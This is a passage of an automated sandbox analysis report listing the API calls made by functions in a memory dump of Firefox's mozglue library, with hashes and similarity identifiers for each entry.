                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CB09EF5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 956590011-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CB0DDCF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CAEFA4B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB090FF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB09108
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DE0D
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB0DE41
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DE5F
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DEA3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DEE9
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CAFDEFD,?,6CAC4A68), ref: 6CB0DF32
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB0DB86
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB0DC0E
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CAFDEFD,?,6CAC4A68), ref: 6CB0DF65
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB0DF80
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 112305417-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D32
                                                                                                                                                                                                                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D62
                                                                                                                                                                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D6D
                                                                                                                                                                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D84
                                                                                                                                                                                                                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15DA4
                                                                                                                                                                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15DC9
                                                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CB15DDB
                                                                                                                                                                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15E00
                                                                                                                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15E45
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CAB31A7), ref: 6CAECDDD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: LoadLibraryW.KERNEL32(shell32,?,6CB2D020), ref: 6CABF122
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CABF132
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CABED50
                                                                                                                                                                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CABEDAC
                                                                                                                                                                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CABEDCC
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CABEE08
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CABEE27
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CABEE32
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CABEBB5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CAED7F3), ref: 6CABEBC3
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CAED7F3), ref: 6CABEBD6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CABEDC1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                            • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                            • Opcode ID: 057772f58199fdf4f9b8a5a12e4ab70d7520771ce4a20497d73528b21aaaae13
                                                                                                                                                                                                                                                                            • Instruction ID: bd6f3776f1423d8b998d8388f3ca8207354e00c75fe4180e6744b4bc92e56167
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 057772f58199fdf4f9b8a5a12e4ab70d7520771ce4a20497d73528b21aaaae13
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39510171D053449BDB00DF68C9406EEB7B8AF49318F08886DE8557B780E774A9C8CBE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB2A565
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB2A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB2A4BE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB2A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB2A4D6
                                                                                                                                                                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB2A65B
                                                                                                                                                                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB2A6B6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                            • String ID: 0$z
                                                                                                                                                                                                                                                                            • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                            • Opcode ID: 8ed64ac78575fa512eb98b616ba8ba108c9454ce4e6f1a6d472078898ab6d814
                                                                                                                                                                                                                                                                            • Instruction ID: 22291dd6e1df24bcbb786a271509978b7558850c417de552aaeccfeaf596edc5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ed64ac78575fa512eb98b616ba8ba108c9454ce4e6f1a6d472078898ab6d814
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F4106719097859FC341DF28C480A9BBBE5FF89354F408A2EF49987650EB34E589CB93
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CAF947D
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CAF946B
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CAF9459
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                            • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                            • Opcode ID: fb345ce2e0717b4a53bd4dabe872e79e4c5ae9be91e9cbe7db1917465fb39e24
                                                                                                                                                                                                                                                                            • Instruction ID: 06d3a80ca3d2d0c070a2549f26c50effc66609e21043475dcf4274cc65211524
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb345ce2e0717b4a53bd4dabe872e79e4c5ae9be91e9cbe7db1917465fb39e24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66012874A0011097D7209F6CDA04A8D33B9DB19339F0C0537E85E87B41DB35D8DA899B
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB01D0F
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CB01BE3,?,?,6CB01D96,00000000), ref: 6CB01D18
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CB01BE3,?,?,6CB01D96,00000000), ref: 6CB01D4C
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB01DB7
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB01DC0
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB01DDA
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: GetCurrentThreadId.KERNEL32 ref: 6CB01F03
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CB01DF2,00000000,00000000), ref: 6CB01F0C
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CB01F20
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CB01DF4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6957d35e98bf5058bf1b1eb71b38cbbe4139161601dc60fec0c506f7f2c04078
                                                                                                                                                                                                                                                                            • Instruction ID: b8fb95ff503a85780a3e67d3827cb15cbfee000147c47f8c31a5101c23877dfc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6957d35e98bf5058bf1b1eb71b38cbbe4139161601dc60fec0c506f7f2c04078
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534178B52007149FCB24DF28C488A5ABBF9FF89318F14452EE99A87B41CB31F854CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF84F3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF850A
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF851E
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF855B
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF856F
                                                                                                                                                                                                                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF85AC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF767F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF7693
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF76A7
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF85B2
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                            • Opcode ID: 56cec2c8bb0c277ee4ed675c31cbcb2947ae4b55d107aa5f1308b59bc4c24c5d
                                                                                                                                                                                                                                                                            • Instruction ID: 24f2d7681d9d7515ae72b3ee427b0ee3b4c7267a0e650000f427285e8a9d266e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56cec2c8bb0c277ee4ed675c31cbcb2947ae4b55d107aa5f1308b59bc4c24c5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621EF752006018FDB24DB25D888A5AB7B9BF4130DF18092CE56FC3B41DB34F889CB40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: GetCurrentProcess.KERNEL32(?,6CAB31A7), ref: 6CAECBF1
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAB31A7), ref: 6CAECBFA
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFF619
                                                                                                                                                                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CAFF598), ref: 6CAFF621
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CAF94EE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CAF9508
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFF637
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8,?,?,00000000,?,6CAFF598), ref: 6CAFF645
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8,?,?,00000000,?,6CAFF598), ref: 6CAFF663
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CAFF62A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
